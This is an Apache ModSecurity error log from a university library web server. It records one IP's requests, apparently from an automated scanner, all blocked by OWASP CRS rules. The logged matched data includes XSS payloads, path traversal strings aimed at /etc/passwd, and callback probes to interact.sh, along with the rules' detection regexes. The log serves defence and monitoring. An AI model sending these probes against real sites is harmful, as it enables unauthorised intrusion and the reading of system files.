[Tue Aug 29 11:52:27.581602 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoN9ccAAAAJ"]
[Tue Aug 29 11:52:28.178583 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAnTlPoAAAAA"]
[Tue Aug 29 11:52:28.721007 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAnn2DgAAAAe"]
[Tue Aug 29 11:52:29.555949 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAoLfFoAAAAG"]
[Tue Aug 29 11:52:30.568940 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAnd3HAAAAAI"]
[Tue Aug 29 11:52:32.620359 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAfWOOsAAAAL"]
[Tue Aug 29 11:52:33.568814 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoT7LoAAAAD"]
[Tue Aug 29 11:52:33.643968 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAnHQj0AAAAT"]
[Tue Aug 29 11:52:34.652576 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoLfHAAAAAG"]
[Tue Aug 29 11:52:34.679703 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoO50EAAAAK"]
[Tue Aug 29 11:52:36.893654 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAoT7MgAAAAD"]
[Tue Aug 29 11:52:37.535153 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnHQlUAAAAT"]
[Tue Aug 29 11:52:37.659224 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAfWOPsAAAAL"]
[Tue Aug 29 11:52:40.015250 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAnTlTAAAAAA"]
[Tue Aug 29 11:52:40.535362 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAnjjSAAAAAX"]
[Tue Aug 29 11:52:41.711694 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAfWOQ0AAAAL"]
[Tue Aug 29 11:52:42.536270 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoT7OoAAAAD"]
[Tue Aug 29 11:52:42.551893 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnd3KUAAAAI"]
[Tue Aug 29 11:52:45.059385 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15ncCo-f0AAAoVqoYAAAAH"]
[Tue Aug 29 11:52:45.583961 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoQ3MkAAAAN"]
[Tue Aug 29 11:52:46.566939 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAnjjUYAAAAX"]
[Tue Aug 29 11:52:46.838087 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAnjjUkAAAAX"]
[Tue Aug 29 11:52:47.627683 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAnTlU0AAAAA"]
[Tue Aug 29 11:52:47.683767 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoGFbQAAAAE"]
[Tue Aug 29 11:52:48.801300 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAnjjVYAAAAX"]
[Tue Aug 29 11:52:49.587448 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoO540AAAAK"]
[Tue Aug 29 11:52:49.597349 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAnTlVoAAAAA"]
[Tue Aug 29 11:52:49.618396 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAnTlVsAAAAA"]
[Tue Aug 29 11:52:50.728280 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15osCo-f0AAAoLfLwAAAAG"]
